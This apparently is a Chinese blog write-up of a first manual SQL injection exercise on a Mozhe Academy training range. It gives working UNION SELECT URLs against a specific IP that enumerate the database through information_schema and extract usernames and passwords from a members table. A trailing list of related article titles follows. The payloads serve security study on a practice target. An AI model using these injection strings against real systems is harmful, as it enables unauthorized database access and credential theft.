博主首次浅尝一下SQL注入,一顿操作,然后,啊哈

破解成功!

墨者学院靶场地址

step1: 判断注入

判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。

step2: 猜解列名数量

order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。
order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。
order by 默认升序,降序关键字DESC,即order by 字段名 DESC;
所以使用order by关键字就能够知道整个表一共有多少个列。
获取列名数量是为了使用union关键字,union关键字是连接两个查询结果,但是前提条件是两个查询结果的字段个数是一样的。所以要先获取字段(列名)个数。

step3:信息收集函数

查看数据库版本:version()
查看数据库名字:database()
查看数据库用户:user()
查看操作系统:@@version_compile_os

http://124.70.64.48:41620/new_list.php?id=2%20union%20select%201,2,3,4


把2,3位置替换成函数version()和database()就能看到数据库的版本和名字。


所以版本5.7.22-0ubuntu0.16.04.1,属于高版本,可以使用information_schema数据库来查询,它存储有数据库名,表名,列名的数据库,可以通过它查询指定数据库下的表名和列名。
关于information_schema的介绍,有个大佬的文章写的非常好!

数据库名字mozhe_Discuz_StormGroup

再看用户和操作系统

http://124.70.64.48:41620/new_list.php?id=2%20union%20select%201,user(),@@version_compile_os,4

information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_name:表名
column_name:列名

查询语句

http://124.70.64.48:41620/new_list.php?id=2 union select 1,table_name,3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

http://124.70.64.48:41620/new_list.php?id=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'
# group_concat关键字是为了查到这个mozhe数据库下面所有的表


查询指定表名StormGroup_member下的列名信息

http://124.70.64.48:41620/new_list.php?id=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'StormGroup_member'


查询指定数据

http://124.70.64.48:41620/new_list.php?id=2 union select 1,name,password,4 from StormGroup_member

拿到账号和密码

【墨者学院】SQL手动注入 靶场初体验相关推荐

  1. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  2. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  3. SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...

  4. MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...

  5. 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...

  6. 墨者学院-SQL注入漏洞测试(报错盲注)

    继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...

  7. 墨者学院-SQL注入漏洞测试(布尔盲注)

    决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...

  8. 墨者学院—SQL过滤字符后手工注入漏洞测试

    靶场地址: SQL过滤字符后手工注入漏洞测试(第1题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话 ...

  9. 渣渣白学习渗透之路(墨者学院sql注入之旅)

    渣渣白学习渗透之路 说明:1.  未经授权的渗透测试都是违法的! 2.  文章用红色字体编写的部分是关键部分(认真看)!!! 3.  文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4.  文章 ...

最新文章

  1. 自动检索、修复Python代码bug,微软推出DeepDebug
  2. 认识下PHP如何使用 phpmailer 发送电子邮件
  3. Java Web整合开发(85)
  4. 5、Makefile基础知识汇总(转自陈皓总述)
  5. Spring Boot 集成 Activiti
  6. 进程间通信-共享内存实例
  7. Arthas | 定位线上 Dubbo 线程池满异常
  8. 【每周CV论文推荐】 人脸识别剩下的难题:从遮挡,年龄,姿态,妆造到亲属关系,人脸攻击...
  9. xp系统中的隐藏文件不能显示 解决方案
  10. Linux中的组合键
  11. error: 'syms' undefined near line 1 column 1
  12. 计算机网路【2】数据链路层
  13. Eclipse SVN修改用户名和密码
  14. 面试常被问的65个问题及回答技巧(请收藏)
  15. linux 列出指定目录下所有文件的 列表集合
  16. 脉冲耦合神经网络(PCNN)的python实现
  17. 【CV-Paper 08】ResNet:Deep Residual Learning for Image Recognition
  18. liunx命令大全建议粘贴到word文档可方便查询
  19. ps计算机设置在哪,在哪里设置PS对称渐变工具
  20. 计算机工程中级职称怎么考,以前中级职称是要考什么计算机-计算机软考中级职称哪个好考...

热门文章

  1. 微型计算机控制技术 西安交大,西安交通大学18年9月课程考试《计算机控制技术》作业考核试题满分...
  2. 微信服务商和渠道商区别
  3. FFmpeg的那些坑-RTP missed xxx packets
  4. 解决 {ret:100030,msg:this api without user authorization} android QQ第三发登录成功后获取用户信息失败的问题
  5. 【数据仓库】现代数据仓库坏了吗?
  6. python 获取值类型用于定义变量_Python中的变量和简单数据类型
  7. #网站图标、地址栏图标、收藏夹图标、favicon.ico
  8. java对接阿里云短信服务详解(验证码,推广短信,通知短信)
  9. Git Failed to connect to github.com port 443: Timed out
  10. 解决GERRIT MERGE冲突“GIT SUBMIT INCLUDING PARENTS”